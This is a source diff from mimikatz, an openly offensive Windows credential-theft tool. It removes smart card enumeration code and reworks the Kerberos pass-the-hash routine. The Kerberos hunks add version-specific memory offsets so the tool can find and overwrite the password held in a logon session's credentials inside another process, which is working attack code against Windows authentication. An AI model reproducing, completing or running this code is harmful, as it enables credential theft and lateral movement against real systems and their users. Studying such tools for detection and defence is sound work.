PRINT_ERROR_AUTO(L"CryptEnumProviders");
|
||||
return provType;
|
||||
}
|
||||
|
||||
PWSTR kuhl_m_crypto_l_sc_containerFromReader(LPCWSTR reader)
|
||||
{
|
||||
PWSTR result = NULL;
|
||||
DWORD szReader = (DWORD) wcslen(reader);
|
||||
if(result = (PWSTR) LocalAlloc(LPTR, (szReader + 6) * sizeof(wchar_t)))
|
||||
{
|
||||
RtlCopyMemory(result, L"\\\\.\\", 4 * sizeof(wchar_t));
|
||||
RtlCopyMemory(result + 4, reader, szReader * sizeof(wchar_t));
|
||||
RtlCopyMemory(result + 4 + szReader, L"\\", 1 * sizeof(wchar_t));
|
||||
}
|
||||
return result;
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_crypto_l_sc(int argc, wchar_t * argv[])
|
||||
{
|
||||
SCARDCONTEXT hContext;
|
||||
SCARDHANDLE hCard;
|
||||
PBYTE atr;
|
||||
LONG status;
|
||||
LPWSTR mszReaders = NULL, pReader, mszCards = NULL, pCard, szProvider = NULL, szContainer;
|
||||
DWORD dwLen = SCARD_AUTOALLOCATE, dwAtrLen;
|
||||
|
||||
status = SCardEstablishContext(SCARD_SCOPE_SYSTEM, NULL, NULL, &hContext);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
status = SCardListReaders(hContext, SCARD_ALL_READERS, (LPWSTR) &mszReaders, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L"SmartCard readers:");
|
||||
for(pReader = mszReaders; *pReader; pReader += wcslen(pReader) + 1)
|
||||
{
|
||||
kprintf(L"\n * %s\n", pReader);
|
||||
if(szContainer = kuhl_m_crypto_l_sc_containerFromReader(pReader))
|
||||
{
|
||||
status = SCardConnect(hContext, pReader, SCARD_SHARE_SHARED, SCARD_PROTOCOL_T0 | SCARD_PROTOCOL_T1, &hCard, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
dwAtrLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardGetAttrib(hCard, SCARD_ATTR_ATR_STRING, (PBYTE) &atr, &dwAtrLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" ATR : ");
|
||||
kull_m_string_wprintf_hex(atr, dwAtrLen, 0);
|
||||
kprintf(L"\n");
|
||||
dwLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardListCards(hContext, atr, NULL, 0, (LPWSTR) &mszCards, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
for(pCard = mszCards; pCard && *pCard; pCard += wcslen(pCard) + 1)
|
||||
{
|
||||
kprintf(L" Model: %s\n", pCard);
|
||||
|
||||
dwLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardGetCardTypeProviderName(hContext, pCard, SCARD_PROVIDER_PRIMARY, (LPWSTR) &szProvider, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" PRIM : %s\n", szProvider);
|
||||
SCardFreeMemory(hContext, szProvider);
|
||||
}
|
||||
else if(status != ERROR_FILE_NOT_FOUND) PRINT_ERROR(L"SCardGetCardTypeProviderName(PRIM): 0x%08x\n", status);
|
||||
|
||||
dwLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardGetCardTypeProviderName(hContext, pCard, SCARD_PROVIDER_CSP, (LPWSTR) &szProvider, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" CSP : %s\n", szProvider);
|
||||
if(dwLen = kuhl_m_crypto_l_sc_provtypefromname(szProvider))
|
||||
kuhl_m_crypto_l_keys_capi(szContainer, szProvider, dwLen, CRYPT_SILENT, FALSE, NULL);
|
||||
SCardFreeMemory(hContext, szProvider);
|
||||
}
|
||||
else if(status != ERROR_FILE_NOT_FOUND) PRINT_ERROR(L"SCardGetCardTypeProviderName(CSP): 0x%08x\n", status);
|
||||
|
||||
dwLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardGetCardTypeProviderName(hContext, pCard, SCARD_PROVIDER_KSP, (LPWSTR) &szProvider, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" KSP : %s\n", szProvider);
|
||||
kuhl_m_crypto_l_keys_cng(szContainer, szProvider, 0, FALSE, NULL);
|
||||
SCardFreeMemory(hContext, szProvider);
|
||||
}
|
||||
else if(status != ERROR_FILE_NOT_FOUND) PRINT_ERROR(L"SCardGetCardTypeProviderName(KSP): 0x%08x\n", status);
|
||||
|
||||
dwLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardGetCardTypeProviderName(hContext, pCard, SCARD_PROVIDER_CARD_MODULE, (LPWSTR) &szProvider, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" MDRV : %s\n", szProvider);
|
||||
kuhl_m_crypto_l_mdr(szProvider, hContext, hCard, pCard, atr, dwAtrLen);
|
||||
SCardFreeMemory(hContext, szProvider);
|
||||
}
|
||||
else if(status != ERROR_FILE_NOT_FOUND) PRINT_ERROR(L"SCardGetCardTypeProviderName(MDR): 0x%08x\n", status);
|
||||
}
|
||||
SCardFreeMemory(hContext, mszCards);
|
||||
}
|
||||
else PRINT_ERROR(L"SCardListCards: 0x%08x\n", status);
|
||||
SCardFreeMemory(hContext, atr);
|
||||
}
|
||||
else PRINT_ERROR(L"SCardGetAttrib: 0x%08x (%u)\n", status, dwAtrLen);
|
||||
SCardDisconnect(hCard, SCARD_LEAVE_CARD);
|
||||
}
|
||||
else if(status != SCARD_W_REMOVED_CARD)
|
||||
PRINT_ERROR(L"SCardConnect: 0x%08x\n", status);
|
||||
LocalFree(szContainer);
|
||||
}
|
||||
}
|
||||
SCardFreeMemory(hContext, mszReaders);
|
||||
}
|
||||
else PRINT_ERROR(L"SCardListReaders: 0x%08x\n", status);
|
||||
SCardReleaseContext(hContext);
|
||||
}
|
||||
else PRINT_ERROR(L"SCardEstablishContext: 0x%08x\n", status);
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
LPVOID WINAPI mdAlloc(__in SIZE_T Size)
|
||||
{
|
||||
return malloc(Size);
|
||||
}
|
||||
|
||||
LPVOID WINAPI mdReAlloc( __in LPVOID Address, __in SIZE_T Size)
|
||||
{
|
||||
return realloc(Address, Size);
|
||||
}
|
||||
|
||||
void WINAPI mdFree( __in LPVOID Address)
|
||||
{
|
||||
if(Address)
|
||||
free(Address);
|
||||
}
|
||||
|
||||
DWORD WINAPI mdCacheAddFile(__in PVOID pvCacheContext, __in LPWSTR wszTag, __in DWORD dwFlags, __in_bcount(cbData) PBYTE pbData, __in DWORD cbData)
|
||||
{
|
||||
kprintf(TEXT(__FUNCTION__) L"\n");
|
||||
return SCARD_E_INVALID_PARAMETER;
|
||||
}
|
||||
|
||||
DWORD WINAPI mdCacheLookupFile(__in PVOID pvCacheContext, __in LPWSTR wszTag, __in DWORD dwFlags, __deref_out_bcount(*pcbData) PBYTE *ppbData, __out PDWORD pcbData)
|
||||
{
|
||||
kprintf(TEXT(__FUNCTION__) L"\n");
|
||||
return SCARD_E_INVALID_PARAMETER;
|
||||
}
|
||||
|
||||
DWORD WINAPI mdCacheDeleteFile(__in PVOID pvCacheContext, __in LPWSTR wszTag, __in DWORD dwFlags)
|
||||
{
|
||||
kprintf(TEXT(__FUNCTION__) L"\n");
|
||||
return SCARD_E_INVALID_PARAMETER;
|
||||
}
|
||||
|
||||
DWORD WINAPI mdPadData(__in PCARD_SIGNING_INFO pSigningInfo, __in DWORD cbMaxWidth, __out DWORD* pcbPaddedBuffer, __deref_out_bcount(*pcbPaddedBuffer) PBYTE* ppbPaddedBuffer)
|
||||
{
|
||||
kprintf(TEXT(__FUNCTION__) L"\n");
|
||||
return SCARD_E_INVALID_PARAMETER;
|
||||
}
|
||||
|
||||
void enuma(PCARD_DATA pData, LPCSTR dir)
|
||||
{
|
||||
LPSTR files = NULL, p;
|
||||
DWORD status, nFiles = 0;
|
||||
|
||||
kprintf(L" \\%-8S: ", dir ? dir : "<root>");
|
||||
status = pData->pfnCardEnumFiles(pData, (LPSTR) dir, &files, &nFiles, 0);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
for(p = files; *p; p += lstrlenA(p) + 1)
|
||||
kprintf(L"%S ; ", p);
|
||||
kprintf(L"\n");
|
||||
pData->pfnCspFree(files);
|
||||
}
|
||||
else if(status == SCARD_E_FILE_NOT_FOUND)
|
||||
kprintf(L"<empty>\n");
|
||||
else PRINT_ERROR(L"CardEnumFiles: 0x%08x\n", status);
|
||||
}
|
||||
|
||||
void descblob(PUBLICKEYSTRUC *pk)
|
||||
{
|
||||
kprintf(L"%s", kull_m_crypto_algid_to_name(pk->aiKeyAlg));
|
||||
switch(pk->aiKeyAlg)
|
||||
{
|
||||
case CALG_RSA_KEYX:
|
||||
case CALG_RSA_SIGN:
|
||||
kprintf(L" (%u)", ((PRSA_GENERICKEY_BLOB) pk)->RsaKey.bitlen);
|
||||
break;
|
||||
default:
|
||||
;
|
||||
}
|
||||
}
|
||||
|
||||
void kuhl_m_crypto_l_mdr(LPCWSTR szMdr, SCARDCONTEXT ctxScard, SCARDHANDLE hScard, LPCWSTR szModel, LPCBYTE pbAtr, DWORD cbAtr)
|
||||
{
|
||||
HMODULE hModule;
|
||||
CARD_DATA cd = {0};
|
||||
PFN_CARD_ACQUIRE_CONTEXT CardAcquireContext;
|
||||
//CARD_CAPABILITIES cap = {CARD_CAPABILITIES_CURRENT_VERSION, FALSE, FALSE};
|
||||
CARD_FREE_SPACE_INFO spa = {CARD_FREE_SPACE_INFO_CURRENT_VERSION, 0, 0, 0};
|
||||
CONTAINER_INFO ci;
|
||||
DWORD status, i;
|
||||
|
||||
if(hModule = LoadLibrary(szMdr))
|
||||
{
|
||||
if(CardAcquireContext = (PFN_CARD_ACQUIRE_CONTEXT) GetProcAddress(hModule, "CardAcquireContext"))
|
||||
{
|
||||
cd.dwVersion = CARD_DATA_CURRENT_VERSION; // 7
|
||||
cd.pbAtr = (PBYTE) pbAtr;
|
||||
cd.cbAtr = cbAtr;
|
||||
cd.pwszCardName = (LPWSTR) szModel;
|
||||
|
||||
cd.pfnCspAlloc = mdAlloc;
|
||||
cd.pfnCspReAlloc = mdReAlloc;
|
||||
cd.pfnCspFree = mdFree;
|
||||
cd.pfnCspCacheAddFile = mdCacheAddFile;
|
||||
cd.pfnCspCacheLookupFile = mdCacheLookupFile;
|
||||
cd.pfnCspCacheDeleteFile = mdCacheDeleteFile;
|
||||
cd.pfnCspPadData = mdPadData;
|
||||
|
||||
cd.hSCardCtx = ctxScard;
|
||||
cd.hScard = hScard;
|
||||
|
||||
cd.pfnCspGetDHAgreement = NULL;
|
||||
cd.pfnCspUnpadData = NULL;
|
||||
|
||||
|
||||
status = CardAcquireContext(&cd, 0);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
//status = cd.pfnCardQueryCapabilities(&cd, &cap);
|
||||
//if(status == SCARD_S_SUCCESS)
|
||||
// kprintf(L" CertificateCompression: %08x\n KeyGen: %08x\n", cap.fCertificateCompression, cap.fKeyGen);
|
||||
//else PRINT_ERROR(L"CardQueryCapabilities: 0x%08x\n", status);
|
||||
|
||||
status = cd.pfnCardQueryFreeSpace(&cd, 0, &spa);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" Containers: %u / %u (%u byte(s) free)\n", spa.dwKeyContainersAvailable, spa.dwMaxKeyContainers, spa.dwBytesAvailable);
|
||||
|
||||
for(i = 0; i < spa.dwMaxKeyContainers; i++)
|
||||
{
|
||||
ci.dwVersion = CONTAINER_INFO_CURRENT_VERSION;
|
||||
status = cd.pfnCardGetContainerInfo(&cd, (BYTE) i, 0, &ci);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L"\t[%2u] ", i);
|
||||
if(ci.cbSigPublicKey && ci.pbSigPublicKey)
|
||||
{
|
||||
kprintf(L"Signature: ");
|
||||
descblob((PUBLICKEYSTRUC *) ci.pbSigPublicKey);
|
||||
cd.pfnCspFree(ci.pbSigPublicKey);
|
||||
|
||||
if(ci.cbKeyExPublicKey && ci.pbKeyExPublicKey)
|
||||
kprintf(L" - ");
|
||||
}
|
||||
if(ci.cbKeyExPublicKey && ci.pbKeyExPublicKey)
|
||||
{
|
||||
kprintf(L"Exchange: ");
|
||||
descblob((PUBLICKEYSTRUC *) ci.pbKeyExPublicKey);
|
||||
cd.pfnCspFree(ci.pbKeyExPublicKey);
|
||||
}
|
||||
kprintf(L"\n");
|
||||
}
|
||||
else if(status != SCARD_E_NO_KEY_CONTAINER) PRINT_ERROR(L"CardGetContainerInfo(%u): 0x%08x\n", i, status);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"CardQueryFreeSpace: 0x%08x\n", status);
|
||||
|
||||
enuma(&cd, NULL);
|
||||
enuma(&cd, "mscp");
|
||||
enuma(&cd, "mimikatz");
|
||||
|
||||
|
||||
|
||||
status = cd.pfnCardDeleteContext(&cd);
|
||||
if(status != SCARD_S_SUCCESS)
|
||||
PRINT_ERROR(L"CardDeleteContext: 0x%08x\n", status);
|
||||
}
|
||||
else PRINT_ERROR(L"CardAcquireContext: 0x%08x\n", status);
|
||||
|
||||
}
|
||||
else PRINT_ERROR(L"No CardAcquireContext export in \'%s\'\n", szMdr);
|
||||
FreeLibrary(hModule);
|
||||
}
|
||||
else PRINT_ERROR_AUTO(L"LoadLibrary");
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_crypto_hash(int argc, wchar_t * argv[])
|
||||
{
|
||||
PCWCHAR szCount, szPassword = NULL, szUsername = NULL;
|
||||
@ -1072,7 +768,7 @@ BOOL CALLBACK kuhl_m_crypto_system_directory(DWORD level, PCWCHAR fullpath, PCWC
|
||||
LocalFree(fileData);
|
||||
}
|
||||
}
|
||||
return TRUE;
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_crypto_system(int argc, wchar_t * argv[])
|
||||
@ -1087,8 +783,7 @@ NTSTATUS kuhl_m_crypto_system(int argc, wchar_t * argv[])
|
||||
kprintf(L"* Directory: \'%s\'\n", infile);
|
||||
kull_m_file_Find(infile, NULL, FALSE, 0, FALSE, kuhl_m_crypto_system_directory, &isExport);
|
||||
}
|
||||
else
|
||||
kuhl_m_crypto_system_directory(0, infile, PathFindFileName(infile), &isExport);
|
||||
else kuhl_m_crypto_system_directory(0, infile, PathFindFileName(infile), &isExport);
|
||||
}
|
||||
else PRINT_ERROR(L"Input Microsoft Crypto Certificate file needed (/file:filename|directory)\n");
|
||||
return STATUS_SUCCESS;
|
||||
|
||||
@ -5,11 +5,11 @@
|
||||
*/
|
||||
#pragma once
|
||||
#include "kuhl_m.h"
|
||||
#include <cardmod.h>
|
||||
#include "../modules/kull_m_crypto.h"
|
||||
#include "../modules/kull_m_string.h"
|
||||
#include "../modules/kull_m_file.h"
|
||||
#include "../modules/kull_m_registry.h"
|
||||
#include "crypto/kuhl_m_crypto_sc.h"
|
||||
#include "crypto/kuhl_m_crypto_extractor.h"
|
||||
#include "crypto/kuhl_m_crypto_patch.h"
|
||||
|
||||
@ -49,7 +49,6 @@ NTSTATUS kuhl_m_crypto_l_providers(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_l_stores(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_l_keys(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_l_sc(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_hash(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_system(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_c_sc_auth(int argc, wchar_t * argv[]);
|
||||
@ -65,6 +64,3 @@ wchar_t * kuhl_m_crypto_generateFileName(const wchar_t * term0, const wchar_t *
|
||||
void kuhl_m_crypto_file_rawData(PKUHL_M_CRYPTO_CERT_PROP prop, PCWCHAR inFile, BOOL isExport);
|
||||
void kuhl_m_crypto_l_keys_capi(LPCWSTR szContainer, LPCWSTR szProvider, DWORD dwProvType, DWORD dwFlags, BOOL export, LPCWSTR szStore);
|
||||
void kuhl_m_crypto_l_keys_cng(LPCWSTR szContainer, LPCWSTR szProvider, DWORD dwFlags, BOOL export, LPCWSTR szStore);
|
||||
void kuhl_m_crypto_l_mdr(LPCWSTR szMdr, SCARDCONTEXT ctxScard, SCARDHANDLE hScard, LPCWSTR szModel, LPCBYTE pbAtr, DWORD cbAtr);
|
||||
DWORD kuhl_m_crypto_l_sc_provtypefromname(LPCWSTR szProvider);
|
||||
PWSTR kuhl_m_crypto_l_sc_containerFromReader(LPCWSTR reader);
|
||||
@ -72,6 +72,8 @@ const KERB_INFOS kerbHelper[] = {
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO_5, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
|
||||
},
|
||||
{
|
||||
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -106,7 +108,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_5),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO_5, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -141,7 +145,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -176,7 +182,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -211,7 +219,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
|
||||
@ -246,7 +256,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),
|
||||
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
|
||||
@ -281,7 +293,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),
|
||||
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, LocallyUniqueIdentifier),
|
||||
@ -316,7 +330,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6_1607),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction),
|
||||
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction)
|
||||
},
|
||||
};
|
||||
|
||||
@ -444,7 +460,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
|
||||
BYTE ntlmHash[LM_NTLM_HASH_LENGTH], aes128key[AES_128_KEY_LENGTH], aes256key[AES_256_KEY_LENGTH];
|
||||
BOOL isNtlm = FALSE, isAes128 = FALSE, isAes256 = FALSE;
|
||||
UNICODE_STRING nullPasswd = {0, 0, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}, aLocalNTLMMemory = {NULL, Localkerbsession.hMemory}, aLocalPasswdMemory = {&nullPasswd, Localkerbsession.hMemory}, aRemotePasswdMemory = {(PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}, aLocalNTLMMemory = {NULL, Localkerbsession.hMemory}, aLocalPasswdMemory = {&nullPasswd, Localkerbsession.hMemory}, aRemotePasswdMemory = {(PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetPasswordErase, RemoteLocalKerbSession.hMemory};
|
||||
PKERB_HASHPASSWORD_GENERIC pHash;
|
||||
PBYTE baseCheck;
|
||||
PCWCHAR resultok;
|
||||
@ -526,12 +542,16 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
}
|
||||
|
||||
if(pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
|
||||
if(pthData->isReplaceOk)
|
||||
{
|
||||
kprintf(L"\n \\_ *Password replace -> ");
|
||||
if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, sizeof(UNICODE_STRING)))
|
||||
kprintf(L"null", aRemotePasswdMemory.address);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
kprintf(L"\n \\_ *Password replace @ %p (%u) -> ", aRemotePasswdMemory.address, (DWORD) kerbHelper[KerbOffsetIndex].passwordEraseSize);
|
||||
if(aLocalPasswdMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].passwordEraseSize))
|
||||
{
|
||||
if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, kerbHelper[KerbOffsetIndex].passwordEraseSize))
|
||||
kprintf(L"null");
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
LocalFree(aLocalPasswdMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalHashMemory.address);
|
||||
|
||||
@ -74,6 +74,9 @@ typedef struct _KERB_INFOS {
|
||||
LONG offsetSizeOfCsp;
|
||||
LONG offsetNames;
|
||||
SIZE_T structCspInfosSize;
|
||||
|
||||
LONG offsetPasswordErase;
|
||||
SIZE_T passwordEraseSize;
|
||||
} KERB_INFOS, *PKERB_INFOS;
|
||||
|
||||
typedef struct _KERB_SMARTCARD_CSP_INFO_5 {
|
||||
|
||||
Binary file not shown.
@ -21,7 +21,7 @@ BLOCK "StringFileInfo"
|
||||
VALUE "FileDescription", "mimilove for Windows 2000"
|
||||
VALUE "FileVersion", "1.0.0.0"
|
||||
VALUE "InternalName", "mimilove"
|
||||
VALUE "LegalCopyright", "Copyright (c) 2007 - 2017 gentilkiwi (Benjamin DELPY)"
|
||||
VALUE "LegalCopyright", "Copyright (c) 2007 - 2018 gentilkiwi (Benjamin DELPY)"
|
||||
VALUE "OriginalFilename", "mimilove.exe"
|
||||
VALUE "PrivateBuild", "Build with love for POC only"
|
||||
VALUE "SpecialBuild", "kiwi flavor !"
|
||||
|
||||
@ -85,7 +85,10 @@ extern WINSETUPAPI HDEVINFO WINAPI SetupDiGetClassDevsW(__in_opt CONST GUID *Cla
|
||||
